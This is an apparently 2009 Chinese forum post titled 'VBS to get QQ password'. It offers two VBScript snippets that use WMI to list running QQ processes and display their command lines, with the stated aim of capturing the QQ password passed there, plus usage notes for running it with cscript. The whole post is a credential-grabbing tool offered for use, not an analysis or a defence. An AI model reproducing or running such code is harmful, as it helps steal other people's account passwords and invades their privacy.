dongfang1017 发表于 2009-7-2 06:26:13

VBS 实现获得QQ密码

代码:
for each i in getobject ("winmgmts:\\.\root\cimv2").execquery("select * from win32_process where name like '%qq%'")
inputbox "","",i.commandline
next
cmdshell下得到qq密码代码:
for each i in getobject ("winmgmts:\\.\root\cimv2").execquery("select * from win32_process where name like '%qq%'")
Wscript.echo "","",i.commandline
next
用法:cscript.exe *.vbs(上面的不用,直接运行)
09版的不支持
页: [1]
查看完整版本: VBS 实现获得QQ密码